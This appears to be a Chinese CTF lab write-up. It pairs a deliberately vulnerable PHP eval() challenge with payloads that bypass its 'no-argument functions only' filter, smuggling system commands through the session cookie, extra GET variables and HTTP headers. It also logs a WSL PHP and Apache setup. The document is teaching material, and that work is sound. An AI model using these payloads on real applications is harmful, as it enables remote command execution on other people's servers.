RCE的CTF题目环境和做题复现第2集

1 通过wsl的ubuntu环境部署

2 题目

2.1 http://127.0.0.1/rce1/rce1.php

<?php
if(isset($_GET['code'])){
    if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])){
        eval($_GET['code']);
    }else{
        die('nonono');
    }
}else{
    highlight_file(__FILE__);
}

3 EXP

3.1.1 code=phpinfo();

3.1.2 code=session_start();

3.1.3 code=var_dump(session_id(session_start()));

3.1.4 system(“ls”);进行十六进制编码73797374656d28226c7322293b

3.1.5 替换cookie值

3.1.6 var_dump(hex2bin(session_id(session_start())));

3.1.7 eval(hex2bin(session_id(session_start())));

3.1.8 system(“ls /”);进行十六进制编码73797374656d28226c73202f22293b

3.1.9 看到flag

3.2.1 var_dump(get_defined_vars());

3.2.2 var_dump(current(get_defined_vars()));

3.2.3 var_dump(current(get_defined_vars()));&a=ls

3.2.4 var_dump(next(current(get_defined_vars())));&a=ls

3.2.5 system(next(current(get_defined_vars())));&a=ls

3.2.6 system(next(current(get_defined_vars())));&a=ls%20/

3.3.1 var_dump(getallheaders());

3.3.2 增加Cmd: ls /

3.3.3 var_dump(end(getallheaders()));

3.3.4 system(end(getallheaders()));

4 环境搭建

4 解题过程

4.0.1 在wsl的ubuntu上安装php环境

Step 1: Remove Existing PHP Versions
First, let’s clean up any existing PHP 7.x installations:

sudo apt-get purge php7.*
sudo apt-get autoclean
sudo apt-get autoremove
Note about these commands:

autoclean removes obsolete package files from your cache
autoremove removes dependencies that are no longer needed
Using purge removes both packages and their configuration files
Step 2: Add the PHP Repository
Ondřej Surý maintains up-to-date PHP packages for Ubuntu:

sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
Step 3: Install PHP 7.3
Now install PHP 7.3 and common extensions:

sudo apt-get install php7.3
Step 4: Configure Apache (if using Apache)
If you’re using Apache as your web server:

# Disable old PHP module (if any)
sudo a2dismod php7.0  # or whatever version you had before

# Enable PHP 7.3
sudo a2enmod php7.3
sudo systemctl restart apache2

4.0.2 /var/www/html配置普通账户可读可写可执行权限

(base) gpu3090@DESKTOP-8IU6393:~$ chown  gpu3090 /var/www/html
chown: changing ownership of '/var/www/html': Operation not permitted
(base) gpu3090@DESKTOP-8IU6393:~$ sudo chown  gpu3090 /var/www/html
(base) gpu3090@DESKTOP-8IU6393:~$ ls
M5-应用集成  anaconda3  cookies.txt  downloads  snap  summaries  tmpg00x95ve.mp3
(base) gpu3090@DESKTOP-8IU6393:~$

4.1 切换php7.1

(base) gpu3090@DESKTOP-8IU6393:/$ sudo apt-get install php7.1
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
Suggested packages:
  php-pear
The following NEW packages will be installed:
  libapache2-mod-php7.1 libpcre3 php7.1 php7.1-cli php7.1-common php7.1-json php7.1-opcache php7.1-readline
0 upgraded, 8 newly installed, 0 to remove and 2 not upgraded.
Need to get 3997 kB of archives.
After this operation, 15.0 MB of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://archive.ubuntu.com/ubuntu noble/universe amd64 libpcre3 amd64 2:8.39-15build1 [248 kB]
Get:2 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-common amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [579 kB]
Get:3 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-json amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [19.4 kB]
Get:4 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-opcache amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [164 kB]
Get:5 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-readline amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [13.4 kB]
Get:6 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1-cli amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1489 kB]
Get:7 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 libapache2-mod-php7.1 amd64 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [1418 kB]
Get:8 https://ppa.launchpadcontent.net/ondrej/php/ubuntu noble/main amd64 php7.1 all 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 [66.0 kB]
Fetched 3997 kB in 55s (73.2 kB/s)
Selecting previously unselected package libpcre3:amd64.
(Reading database ... 43387 files and directories currently installed.)
Preparing to unpack .../0-libpcre3_2%3a8.39-15build1_amd64.deb ...
Unpacking libpcre3:amd64 (2:8.39-15build1) ...
Selecting previously unselected package php7.1-common.
Preparing to unpack .../1-php7.1-common_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-json.
Preparing to unpack .../2-php7.1-json_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-opcache.
Preparing to unpack .../3-php7.1-opcache_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-readline.
Preparing to unpack .../4-php7.1-readline_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1-cli.
Preparing to unpack .../5-php7.1-cli_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package libapache2-mod-php7.1.
Preparing to unpack .../6-libapache2-mod-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_amd64.deb ...
Unpacking libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Selecting previously unselected package php7.1.
Preparing to unpack .../7-php7.1_7.1.33-67+ubuntu24.04.1+deb.sury.org+1_all.deb ...
Unpacking php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Setting up libpcre3:amd64 (2:8.39-15build1) ...
Setting up php7.1-common (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/calendar.ini with new version

Creating config file /etc/php/7.1/mods-available/ctype.ini with new version

Creating config file /etc/php/7.1/mods-available/exif.ini with new version

Creating config file /etc/php/7.1/mods-available/fileinfo.ini with new version

Creating config file /etc/php/7.1/mods-available/ftp.ini with new version

Creating config file /etc/php/7.1/mods-available/gettext.ini with new version

Creating config file /etc/php/7.1/mods-available/iconv.ini with new version

Creating config file /etc/php/7.1/mods-available/pdo.ini with new version

Creating config file /etc/php/7.1/mods-available/phar.ini with new version

Creating config file /etc/php/7.1/mods-available/posix.ini with new version

Creating config file /etc/php/7.1/mods-available/shmop.ini with new version

Creating config file /etc/php/7.1/mods-available/sockets.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvmsg.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvsem.ini with new version

Creating config file /etc/php/7.1/mods-available/sysvshm.ini with new version

Creating config file /etc/php/7.1/mods-available/tokenizer.ini with new version
Setting up php7.1-opcache (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/opcache.ini with new version
Setting up php7.1-readline (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/readline.ini with new version
Setting up php7.1-json (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/mods-available/json.ini with new version
Setting up php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/cli/php.ini with new version
Setting up libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...

Creating config file /etc/php/7.1/apache2/php.ini with new version
libapache2-mod-php7.1: php7.3 module already enabled, not enabling PHP 7.1
Setting up php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libc-bin (2.39-0ubuntu8.5) ...
Processing triggers for man-db (2.12.0-4build2) ...
Processing triggers for php7.1-cli (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
Processing triggers for libapache2-mod-php7.1 (7.1.33-67+ubuntu24.04.1+deb.sury.org+1) ...
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.3.33-24+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 07:05:25) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.33, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.33-24+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo update-alternatives --config php
There are 3 choices for the alternative php (providing /usr/bin/php).

  Selection    Path             Priority   Status
------------------------------------------------------------
  0            /usr/bin/php7.4   74        auto mode
  1            /usr/bin/php7.1   71        manual mode
* 2            /usr/bin/php7.3   73        manual mode
  3            /usr/bin/php7.4   74        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/bin/php7.1 to provide /usr/bin/php (php) in manual mode
(base) gpu3090@DESKTOP-8IU6393:/$ php -v
PHP 7.1.33-67+ubuntu24.04.1+deb.sury.org+1 (cli) (built: Dec 24 2024 06:50:54) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.1.33-67+ubuntu24.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ sudo a2enmod php7.1
Considering dependency mpm_prefork for php7.1:
Considering conflict mpm_event for mpm_prefork:
Considering conflict mpm_worker for mpm_prefork:
Module mpm_prefork already enabled
Considering conflict php5 for php7.1:
Enabling module php7.1.
To activate the new configuration, you need to run:
  systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$ systemctl restart apache2
Failed to restart apache2.service: Interactive authentication required.
See system logs and 'systemctl status apache2.service' for details.
(base) gpu3090@DESKTOP-8IU6393:/$ sudo systemctl restart apache2
(base) gpu3090@DESKTOP-8IU6393:/$

4.0.3 将题目代码和flag存放到/var/www/html/相应的位置

4.1 在vscode上运行上面的EXP的php脚本

需要安装插件php debug 和php Server